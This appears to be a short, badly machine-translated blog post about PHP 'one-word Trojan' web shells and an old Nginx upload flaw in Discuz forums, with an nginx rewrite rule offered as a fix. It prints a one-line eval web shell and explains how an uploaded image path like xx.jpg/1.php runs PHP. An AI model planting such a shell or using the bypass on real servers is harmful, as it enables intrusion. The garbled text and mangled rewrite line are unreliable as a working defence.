The server was found to be planted a lot of Trojans, but also let people wantonly use ... NND
<?php @eval ($_post[' C ');? >
the use of the method is also very simple, the local commit file point to the commit file, the inside of the PHP code will be executed
This is the only record, PHP must be a good filter system. Be sure to handle the uploaded stuff.
nginx Upload Vulnerability and discuz vulnerability handlingDue to the early version of Nginx, at least I am in the 0.9.X version of the bug still exists, resulting in processed pictures can execute PHP code
Simply put, the PHP code is written to change the extension to a picture, such as the Xx.jpg file after the Discuz and other open-source forum upload function can be uploaded by http://xxx.com/bbs/data/xxxxxxxx/xx.jpg/1.php way to execute Xx.php inside the Code
For Discuz Forum use Nginx server can use rewrite way to prevent code execution
nginx.conf Code
- Rewrite ^/bbs/data/.*\. (jsp|php) $ http://www.xxx.com/break;
other issues, such as source and other folders, are also problematic, and a simple way to prevent PHP from running
About PHP a word trojan